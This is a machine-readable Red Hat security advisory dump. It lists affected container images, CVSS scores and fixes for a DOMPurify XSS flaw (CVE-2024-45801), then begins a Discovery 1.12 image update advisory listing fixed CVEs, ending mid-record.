"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { cve: "CVE-2024-45801", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-16T19:20:09.863249+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312631", }, ], notes: [ { category: "description", text: "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.", title: "Vulnerability description", }, { category: "summary", text: "dompurify: XSS vulnerability via prototype pollution", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45801", }, { category: "external", summary: "RHBZ#2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45801", url: "https://www.cve.org/CVERecord?id=CVE-2024-45801", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", url: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", url: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", url: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", }, ], release_date: "2024-09-16T19:16:11.080000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "dompurify: XSS vulnerability via prototype pollution", }, ], }
rhsa-2025:1249
Vulnerability from csaf_redhat
Published
2025-02-10 18:38
Modified
2025-04-10 22:37
Summary
Red Hat Security Advisory: updated discovery container images
Notes
Topic
Updated container images are now available for Discovery 1.12.
Details
The Discovery container images provided by this update can be downloaded from the Red Hat Container Registry at registry.access.redhat.com. Installation instructions for your platform are available at Red Hat Container Catalog (see References).
Dockerfiles and scripts should be amended either to refer to these new images specifically, or to the latest images generally.
Fixed CVEs:
CVE-2024-39338
CVE-2024-56201
CVE-2024-45590
CVE-2024-41991
CVE-2024-42005
CVE-2024-41989
CVE-2024-8775
CVE-2024-43799
CVE-2024-43796
CVE-2024-43800
CVE-2024-45296
CVE-2024-43788
CVE-2024-21536
CVE-2024-56326
CVE-2024-21538
CVE-2020-11023
CVE-2024-55565
CVE-2023-44270
CVE-2024-6485
CVE-2024-53907
CVE-2024-56374
CVE-2024-52798
CVE-2024-31449
CVE-2024-46981
CVE-2024-31228
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated container images are now available for Discovery 1.12.", title: "Topic", }, { category: "general", text: "The Discovery container images provided by this update can be downloaded from the Red Hat Container Registry at registry.access.redhat.com. Installation instructions for your platform are available at Red Hat Container Catalog (see References).\n\nDockerfiles and scripts should be amended either to refer to these new images specifically, or to the latest images generally.\n\nFixed CVEs:\nCVE-2024-39338\nCVE-2024-56201\nCVE-2024-45590\nCVE-2024-41991\nCVE-2024-42005\nCVE-2024-41989\nCVE-2024-8775\nCVE-2024-43799\nCVE-2024-43796\nCVE-2024-43800\nCVE-2024-45296\nCVE-2024-43788\nCVE-2024-21536\nCVE-2024-56326\nCVE-2024-21538\nCVE-2020-11023\nCVE-2024-55565\nCVE-2023-44270\nCVE-2024-6485\nCVE-2024-53907\nCVE-2024-56374\nCVE-2024-52798\nCVE-2024-31449\nCVE-2024-46981\nCVE-2024-31228", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2025:1249", url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "DISCOVERY-895", url: "https://issues.redhat.com/browse/DISCOVERY-895", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_1249.json", }, ], title: "Red Hat Security Advisory: updated discovery container images", tracking: { current_release_date: "2025-04-10T22:37:52+00:00", generator: { date: "2025-04-10T22:37:52+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2025:1249", initial_release_date: "2025-02-10T18:38:39+00:00", revision_history: [ { date: "2025-02-10T18:38:39+00:00", number: "1", summary: "Initial version", }, { date: "2025-02-10T18:38:39+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T22:37:52+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Discovery 1 for RHEL 9", product: { name: "Discovery 1 for RHEL 9", product_id: "9Base-discovery-1", product_identification_helper: { cpe: "cpe:/o:redhat:discovery:1.0::el9", }, }, }, ], category: "product_family", name: "Red Hat Discovery", }, { branches: [ { category: "product_version", name: "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", product: { name: "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", product_id: "discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", product_identification_helper: { purl: "pkg:oci/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771?arch=amd64&repository_url=registry.redhat.io/discovery/discovery-server-rhel9&tag=1.12.0-1", }, }, }, { category: "product_version", name: "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", product: { name: "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", product_id: "discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", product_identification_helper: { purl: 